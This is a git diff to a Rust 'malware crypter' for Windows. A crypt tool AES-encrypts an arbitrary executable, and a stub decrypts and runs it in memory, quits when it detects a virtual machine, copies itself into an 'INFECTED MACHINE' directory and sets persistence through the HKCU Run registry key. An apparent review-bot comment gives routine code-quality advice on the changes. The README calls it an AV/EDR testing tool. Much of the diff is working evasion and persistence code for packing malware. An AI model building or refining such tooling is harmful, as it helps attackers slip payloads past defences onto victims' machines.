diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..9561e41
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+**/target/**
diff --git a/README.md b/README.md
index 5dd23a0..ed4fddb 100644
--- a/README.md
+++ b/README.md
@@ -2,8 +2,8 @@
 x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexec
 ## Usage
-1. Put your Portable Executable in /crypt/ and rename it to example.exe (or change the code to be the same name as your PE)
-2. In /crypt/ `cargo run`
+1. Put your Portable Executable in /crypt/
+2. In /crypt/ `cargo run ` (will output encrypted_bytes.bin and key.txt)
 3. move encrypted_bytes.bin and key.txt to /stub/src/
 4. In /stub/ `cargo build --target x86_64-pc-windows-gnu --release` or build without `--release` to keep debug symbols
@@ -24,7 +24,7 @@ x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexe
 - Obfuscated Strings
 ## Disclaimer
-This is a tool used to test the Dynamic detection capabilites of AV and EDR, use of this project is at your own risk
+This is a tool used to test the Static + Dynamic detection capabilites of AV and EDR, use of this project is at your own risk
 ## MITRE TTPs (Indicators)
 - User Execution: Malicious File T1204.002
diff --git a/crypt/src/main.rs b/crypt/src/main.rs
index 881c1e4..cc87016 100644
--- a/crypt/src/main.rs
+++ b/crypt/src/main.rs
@@ -1,17 +1,23 @@
+use aes::cipher::{generic_array::GenericArray, BlockEncrypt, KeyInit};
 use aes::Aes128;
-use aes::cipher::{
- BlockEncrypt, KeyInit,
- generic_array::GenericArray,
-};
+use rand::rngs::StdRng;
+use rand::{RngCore, SeedableRng};
 use std::fs::read;
 use std::fs::File;
 use std::io::prelude::*;
-use rand::rngs::StdRng;
-use rand::{RngCore, SeedableRng};
 fn main() -> std::io::Result<()> {
 // Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder
- let plaintext_bytes = read("hexowl.exe").expect("Failed to read file");
+ let args: Vec = std::env::args().collect();
+ if args.len() < 2 {
+ println!("Run with {} ", args.get(0).unwrap());
+ return Err(std::io::Error::new(
+ std::io::ErrorKind::NotFound,
+ "file input not found",
+ ));
+ }
+ let fname = args.get(1).unwrap();
+ let plaintext_bytes = read(fname).expect("Failed to read file");
 let mut encrypted_file = File::create("encrypted_Input.bin")?;
 let mut key_file = File::create("key.txt")?;
@@ -43,4 +49,4 @@ fn main() -> std::io::Result<()> {
 encrypted_file.write_all(&enc_bytes)?;
 key_file.write_all(&key)?;
 Ok(())
-}
\ No newline at end of file
+}
diff --git a/stub/src/main.rs b/stub/src/main.rs
index 8dcd45e..99d50a0 100644
--- a/stub/src/main.rs
+++ b/stub/src/main.rs
@@ -1,27 +1,20 @@
+use aes::cipher::{generic_array::GenericArray, BlockDecrypt, KeyInit};
 use aes::Aes128;
-use aes::cipher::{BlockDecrypt, KeyInit,
- generic_array::GenericArray,
-};
 use inside_vm::inside_vm;
-use std::process::Command;
-use std::{fs, env};
-use std::io::{Read, Cursor, self};
 use std::io::Result;
+use std::io::{self, Cursor, Read};
 use std::path::Path;
+use std::process::Command;
+use std::{env, fs};
 use winreg::enums::{HKEY_CURRENT_USER, KEY_ALL_ACCESS};
 use winreg::RegKey;
-
 fn main() {
-
- if inside_vm(){
-
+ if inside_vm() {
 println!("This is in a vm");
 std::process::exit(0);
-
 } else {
-
 println!("NO VM");
 create_infected_directory();
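Review bot: `read(fname).expect("Failed to read file")` still panics inside a function that returns `std::io::Result<()>`; now that the path is user-supplied, a missing or unreadable file is an expected condition and should propagate as `let plaintext_bytes = read(fname)?;` so the caller sees the real io::Error instead of a panic. The leading comment about renaming example.exe is stale now that the path comes from argv and could read `// Read the input file named by the first CLI argument into a vector`. The output filename also diverges from the README touched in this commit: the code writes `encrypted_Input.bin` while README steps 2–3 refer to `encrypted_bytes.bin`, so one of the two needs to change. The missing-argument branch returns `ErrorKind::NotFound`, which describes a missing file rather than a missing argument; `ErrorKind::InvalidInput` fits better. main's body continues outside the hunk.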
@@ -43,7 +36,7 @@ fn decrypt_file() -> Result> {
 let key = GenericArray::from(key_bytes);
 let cipher = Aes128::new(&key);
- // Decrypt the encrypted bytes in blocks
+ // Decrypt the encrypted bytes in blocks
 let mut decrypted_bytes = Vec::new();
 for block in encrypted_bytes.chunks(16) {
 let mut block_array = GenericArray::clone_from_slice(block);
@@ -54,9 +47,9 @@ fn decrypt_file() -> Result> {
 // Unpad the decrypted bytes
 let padding_size = decrypted_bytes.last().unwrap().clone() as usize;
 let decrypted_bytes = (&decrypted_bytes[..decrypted_bytes.len() - padding_size]).to_vec();
-
 // return decrypted bytes
- Ok(decrypted_bytes, )
+ Ok(decrypted_bytes)
 }
 fn create_infected_directory() -> io::Result<()> {
@@ -64,9 +57,8 @@ fn create_infected_directory() -> io::Result<()> {
 fs::create_dir_all(&infected_dir)?;
 let current_exe = env::current_exe()?;
- let current_exe_filename = current_exe
- .file_name();
-
+ let current_exe_filename = current_exe.file_name();
+
 let infected_exe_path = infected_dir.join(current_exe_filename.unwrap());
 fs::copy(¤t_exe, &infected_exe_path)?;
@@ -85,17 +77,18 @@ fn create_infected_directory() -> io::Result<()> {
 }
 fn persistence() -> io::Result<()> {
-
 if let Ok(current_exe) = env::current_exe() {
 if let Some(file_name) = current_exe.file_stem() {
-
 let executable_name = file_name.to_string_lossy();
 let directory_path = "C:/Rust Crypter - INFECTED MACHINE/";
 let file_path = format!("{}{}.exe", directory_path, executable_name);
 // Open the "Run" registry key
 let hkcu = RegKey::predef(HKEY_CURRENT_USER);
- let run_key = hkcu.open_subkey_with_flags("Software\\Microsoft\\Windows\\CurrentVersion\\Run", KEY_ALL_ACCESS)?;
+ let run_key = hkcu.open_subkey_with_flags(
+ "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
+ KEY_ALL_ACCESS,
+ )?;
 // Add the executable path to the "Run" registry key
 run_key.set_value("RustCrypter", &file_path).err();